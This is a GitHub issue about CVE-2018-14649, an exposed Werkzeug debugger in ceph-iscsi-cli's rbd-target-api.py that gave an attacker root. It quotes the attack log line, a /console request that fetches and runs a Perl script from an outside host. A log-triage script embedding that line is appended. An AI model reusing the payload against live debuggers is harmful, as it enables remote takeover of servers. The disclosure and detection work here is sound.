rbd-target-api.py exploited. #120
Hello,
I've found that the Python code was used to compromise our host remotely (in our case it was running as root, so the attacker gained root privileges). The logs contain:

2018-09-23 05:23:53,267 INFO [_internal.py:87:_log()] - 185.234.217.11 - - [23/Sep/2018 05:23:53] "GET /console?s=7qfxpQm7KShU7OzAilrU&cmd=import+os%3B+os.system%28%27wget+-qO+-+http%3A%2F%2F195.22.126.16%2Fbt.txt%7Cperl%3Bcd+%2Ftmp%3Bcurl+-O+http%3A%2F%2F195.22.126.16%2Fbt.txt%3Bperl+bt.txt%3Brm+-rf+bt.txt%2A%27%29&__debugger__=yes&frm=0 HTTP/1.1" 200 -

Hope this helps.

Comments

@realasmo Thanks for the report of the exposed Werkzeug exploit. I'll open a PR to fix it ASAP.

the end of the logfile contains

Flask is enabling the Werkzeug debugger here [1]
[1] https://github.com/ceph/ceph-iscsi-cli/blob/master/rbd-target-api.py#L2007

CVE-2018-14649 has been assigned for this flaw.

See PR #121

Resolved -- also ceph/ceph#24248 includes a documentation update to note that this API should not be publicly accessible.

CVE-2018-14649 was assigned to this issue. See also rh#1632078 for additional information.
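To triage this kind of compromise from the Werkzeug request log, here is an added example (not code from ceph-iscsi-cli or from anyone in this thread) that parses Flask/Werkzeug access-log lines, flags requests that reach the debugger's /console endpoint, URL-decodes the submitted cmd parameter, and lists the URLs the payload fetches from. The log-line regex, the field names and the benign line are my assumptions; the attack line is the one quoted in the report above.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Log line quoted in the issue report (copied from the report above).
ATTACK_LOG = (
    '2018-09-23 05:23:53,267 INFO [_internal.py:87:_log()] - 185.234.217.11 - - '
    '[23/Sep/2018 05:23:53] "GET /console?s=7qfxpQm7KShU7OzAilrU&cmd=import+os%3B'
    '+os.system%28%27wget+-qO+-+http%3A%2F%2F195.22.126.16%2Fbt.txt%7Cperl%3Bcd+'
    '%2Ftmp%3Bcurl+-O+http%3A%2F%2F195.22.126.16%2Fbt.txt%3Bperl+bt.txt%3Brm+-rf+'
    'bt.txt%2A%27%29&__debugger__=yes&frm=0 HTTP/1.1" 200 -'
)
# Constructed benign request in the same format, for contrast (not from the report).
BENIGN_LOG = (
    '2018-09-23 05:24:10,001 INFO [_internal.py:87:_log()] - 10.0.0.5 - - '
    '[23/Sep/2018 05:24:10] "GET /api/config HTTP/1.1" 200 -'
)

# Assumed shape of a Werkzeug request record: "<ip> - - [<time>] "<method> <target> HTTP/x" <status>".
# The logger prefix before the IP is ignored by using search() rather than match().
LOG_RE = re.compile(
    r'(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) - - \[(?P<when>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# URLs inside the decoded command; stop at shell separators so "url|perl" yields only the URL.
URL_RE = re.compile(r"https?://[^\s'\"|;]+")


def parse_request(line):
    """Return the ip/when/method/target/status fields, or None if the line is not a request record."""
    m = LOG_RE.search(line)
    return m.groupdict() if m else None


def analyse(line):
    """Classify one log line: None when it does not touch the debugger console, else a finding dict."""
    rec = parse_request(line)
    if rec is None:
        return None
    parts = urlsplit(rec["target"])
    qs = parse_qs(parts.query)  # percent-decodes values and turns '+' into ' '
    # The Werkzeug debugger serves its interactive console at /console and evaluates the
    # 'cmd' parameter when __debugger__=yes is present; neither exists when debug is off.
    if parts.path != "/console" and "__debugger__" not in qs:
        return None
    cmd = qs.get("cmd", [""])[0]
    return {
        "source_ip": rec["ip"],
        "when": rec["when"],
        "status": int(rec["status"]),
        # A 200 on /console means the debugger handled the request, i.e. it was enabled.
        "debugger_reachable": rec["status"] == "200",
        "command": cmd,
        # Second-stage hosts to block and hunt for across the fleet.
        "payload_urls": sorted(set(URL_RE.findall(cmd))),
    }


def scan(lines):
    """Run analyse() over an iterable of log lines and keep only the findings."""
    return [f for f in (analyse(line) for line in lines) if f]


if __name__ == "__main__":
    for finding in scan([ATTACK_LOG, BENIGN_LOG]):
        print(f"{finding['when']} {finding['source_ip']} debugger_reachable={finding['debugger_reachable']}")
        print("  command:", finding["command"])
        print("  payload URLs:", ", ".join(finding["payload_urls"]))
```

Feed it the whole rbd-target-api log (`scan(open(path))`) and every /console hit comes back with the decoded command and the download hosts; a 200 on that path is by itself proof the debugger was live, which is why the fix in PR #121 is to stop enabling it rather than to filter the endpoint.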